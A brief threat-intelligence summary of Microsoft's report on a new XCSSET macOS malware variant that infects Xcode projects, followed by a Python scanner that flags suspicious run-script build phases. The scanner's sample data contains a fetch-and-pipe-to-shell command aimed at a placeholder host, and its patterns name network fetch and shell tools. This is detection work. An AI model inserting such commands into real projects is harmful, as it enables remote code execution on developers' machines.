Microsoft reports a new XCSSET malware variant targeting macOS, adding features like enhanced browser data theft, clipboard hijacking, and persistence. The malware primarily infects Xcode projects used by developers, enabling it to steal sensitive information and cryptocurrency data, with limited attacks observed so far. #XCSSET #macOS #malware #Xcode #cryptostealer
Key points
- The new XCSSET variant targets macOS devices and includes additional stealing capabilities for Firefox browser data.
- It uses modified tools like HackBrowserData to decrypt and export browser data from infected systems.
- The malware employs a clipboard hijacker to replace cryptocurrency addresses with attacker-controlled ones.
- New persistence methods include creating LaunchDaemon entries and fake system applications to hide activity.
- Microsoft advises updating macOS and inspecting Xcode projects carefully to prevent infection.
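
One way to carry out the Xcode project inspection from the last key point, as an added example that is not from Microsoft's report or this page: it lists every run-script build phase in a `project.pbxproj` and flags scripts that match a few heuristics. The heuristic patterns, the focus on run-script phases, the function names and the sample project text are assumptions constructed for illustration.

```python
import re
import sys

# Heuristic markers picked for this example (assumptions, not published indicators).
SUSPICIOUS = {
    "network fetch": re.compile(r"\b(curl|wget)\b"),
    "decode step": re.compile(r"\b(base64|xxd)\b"),
    "piped into a shell": re.compile(r"\|\s*(ba|z)?sh\b"),
    "AppleScript runner": re.compile(r"\bosascript\b"),
    "dynamic eval": re.compile(r"\beval\b"),
}
# One object body: from the isa line to the closing "};" on its own line.
PHASE = re.compile(r"isa = PBXShellScriptBuildPhase;(.*?)\n\s*\};", re.S)
FIELD = r'\b%s = (?:"((?:[^"\\]|\\.)*)"|([^;\s]+));'
ESCAPES = {"n": "\n", "t": "\t"}
# Constructed sample, not taken from any real project.
SAMPLE = r'''
		AA0000000000000000000001 /* Lint */ = {
			isa = PBXShellScriptBuildPhase;
			name = Lint;
			shellScript = "swiftlint lint --quiet\n";
		};
		AA0000000000000000000002 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			name = "Run Script";
			shellScript = "curl -s https://example.invalid/a | sh\n";
		};
'''

def _field(body, key):  # pbxproj value, quoted or bare, with escapes undone
    m = re.search(FIELD % key, body)
    if not m:
        return ""
    raw = m.group(1) if m.group(1) is not None else m.group(2)
    return re.sub(r"\\(.)", lambda e: ESCAPES.get(e.group(1), e.group(1)), raw)

def audit_pbxproj(text):  # every run-script phase plus the heuristics it matches
    findings = []
    for m in PHASE.finditer(text):
        script = _field(m.group(1), "shellScript")
        flags = sorted(k for k, rx in SUSPICIOUS.items() if rx.search(script))
        findings.append({"name": _field(m.group(1), "name") or "(unnamed)",
                         "script": script, "flags": flags})
    return findings

if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE
    for f in audit_pbxproj(text):
        print(f"{f['name']}: {', '.join(f['flags']) or 'no heuristic matched'}")
```

Pass the path to a `project.pbxproj` as the first argument to audit a real project. Only run-script phases are examined, so a clean result does not cover other places where a project can run code at build time.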